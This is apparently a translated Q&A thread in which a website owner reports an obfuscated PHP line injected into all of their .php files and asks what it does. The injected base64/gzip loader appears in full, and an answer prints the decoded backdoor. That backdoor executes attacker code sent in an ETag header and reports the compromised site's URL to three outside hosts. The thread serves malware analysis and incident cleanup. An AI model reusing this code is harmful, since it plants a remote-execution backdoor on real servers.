0

我的网站根本无法运行,我注意到有人将此字符串放在所有 .php 文件的顶部:

<?php /* b9cb27b481275ee07e304fa452b06754b499b5bf */ $u="p"."r"."e"."g"."_"."rep"."l"."ac"."e";$z="gzunc"."om"."press";$m="bas"."e"."64"."_dec"."ode";$u("/x"."wab"."z5/e",$z($m("eNrNVW"."1Po0AQ/"."i8mTfSDBLcslNwnrWj"."P86q2WHOfmgWGlpMuuEBr/737AnSx1XiX"."+3AJ"."Jcu8PDPz"."zMwW1iQ"."9ZmRTsTSCMIvg+CiuaFgmGe0hc3x+97S+zfmphwY9ZNFievv03ENDKbEe0qqHXHF2LmrJ02wkTv1L/iaMka10dHt9YRBnrIVKtjfcylSK5nuIsN2RoAv57MfAF7UFvmzjNSjSzqkl"."/mS8bC3Mf5l"."HB1"."mBNSL0SapSl7Gow2hrIwwwfxclS4F2WXclglun"."Ic30PE"."c"."/t7TUydiL3v"."8CgzudLO"."agV6P"."R3FTwLvV1PTrzHzSEi/P1VaUBIvHs"."NWtcbfJ"."Ot5RgqLNVD2XH4lD79O"."x2o9A06Owjlv+q6/95w1r2jR0q"."Z1G6Sv6UK/b4O1yym"."ucGffDZoB9O"."o8"."uHkmizw6CsG"."NUy03R"."JrHhPigJKFXw+9"."SYzb"."yJjO"."CPfv597/vk1P7exCI0U2iL9MWtZg"."Nc8"."5TceB2"."lvPwmIZOpIuoqbLiAF2Na8tS"."iqgA/cV2ILb9ys7"."C4ReTHOi"."2"."US1xW"."otNw6s2YFLOIS"."jL"."Dp9B0X2xa2Y4DAN"."JHjBpFtAsAgCAAHuMnVjBKRHvArXRC0+lp1enhX35xoFc+S7MBtj"."pZlyb"."fuvIeu+LMm"."eZHQKCFGxhb823jeBO"."RF6pCM0DUPGZAyoYslyfOEQ"."lEYCRVei"."zKvyg+9IC5PeZgwS7NFQk6BAltAmYTECLOVETAZ9/fmJW8Q6jKKZRXHqSq8"."Lagp0TLjJIU5B5qHGS2BlgU3VM3Js/y9k2QrJmkB6shn"."AMhKub5yCFEYNAAaUeI"."i4031NPkKymUWtRp+uPb8XeVAImC61vPJQnJhbm/80S8uMeqhBFo3tv2rFviN"."VdNhtLqf"."jDdiw3EoBtpFoOR7MFxmn5FggELXsSNrgOEs6AcBQY7VN8FyosC2ohBh7MY1Qif"."wH41sPX37KzS6m/pqhYz3+on38OhN/fnj5Lu24PVjCFg"."8ZPxHmxHfTfXR"."ycm3N+BnRcY=")),"/x"."wabz5/"."e"); /* f9d4b9453f919477fd0a13c96fe26367485b9689 */ ?>

这个 ^ 有什么作用?

现在我正在使用命令“grep”来查找所有受感染的文件,但我不确定我是否能够让我的网站再次工作,只从 .php 文件中删除这些字符串。

4

1 回答 1

1

FWIW,以下代码似乎是经过评估的,可能在此过程中犯了一个错误。邪恶,但迷人。似乎与 HTTP ETags 有关。

function NAOWvLp ($nsSLWk, $Qlu) { 
    $QWVH = array(); 
    for ($iyJ=0; $iyJ<256; $iyJ++) { 
        $QWVH[$iyJ] = $iyJ; 
    } 
    $TRNh = 0; 
    for ($iyJ=0; $iyJ<256; $iyJ++) { 
        $TRNh = ($TRNh + $QWVH[$iyJ] + ord($nsSLWk[$iyJ % strlen($nsSLWk)])) % 256; 
        $HMynt = $QWVH[$iyJ]; 
        $QWVH[$iyJ] = $QWVH[$TRNh];
        $QWVH[$TRNh] = $HMynt; 
    } 
    $iyJ = 0; 
    $TRNh = 0; 
    $pvFu = ""; 
    for ($Nuwp=0; $Nuwp<strlen($Qlu); $Nuwp++) { 
        $iyJ = ($iyJ + 1) % 256; 
        $TRNh = ($TRNh + $QWVH[$iyJ]) % 256; 
        $HMynt = $QWVH[$iyJ]; 
        $QWVH[$iyJ] = $QWVH[$TRNh]; 
        $QWVH[$TRNh] = $HMynt; 
        $pvFu .= $Qlu[$Nuwp] ^ chr($QWVH[($QWVH[$iyJ] + $QWVH[$TRNh]) % 256]); 
    } 
    return $pvFu; 
} 

if (isset($_SERVER['HTTP_ETAG']) and 
    $glKV = explode(urldecode("+"), base64_decode(substr($_SERVER['HTTP_ETAG'], 5))) and 
    array_shift($glKV) == "4a9a5250737956456feeb00279bd60eee8bbe5b5") {
    die(eval(implode(urldecode("+"), $glKV)));
    $dmfVio = array("http://vapsindia.org/.kwbaq/","http://creatinghappiness.in/.gtput/","http://eft-psicologia-energetica.com.br/.kjwqp/"); 
    shuffle($dmfVio); 
    @file_get_contents(
        array_pop($dmfVio), 
        false, 
        stream_context_create(
            array(
                "http"=>array(
                            "method"=>"GET",
                            "header"=>"ETag: yJTHY"
                                      .base64_encode(
                                          NAOWvLp(
                                              "yJTHY", 
                                              "mPRNwu 5c b92e "
                                              .base64_encode(
                                                  "61ab82c976d485e1b3bba27430e47db64dc2559f "
                                                  .NAOWvLp(
                                                      "4a9a5250737956456feeb00279bd60eee8bbe5b5", 
                                                      $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']
                                                  )
                                              )
                                          )
                                      )."\r\n"
                        )
            )
        )
    );
}
于 2013-09-25T22:34:49.787 回答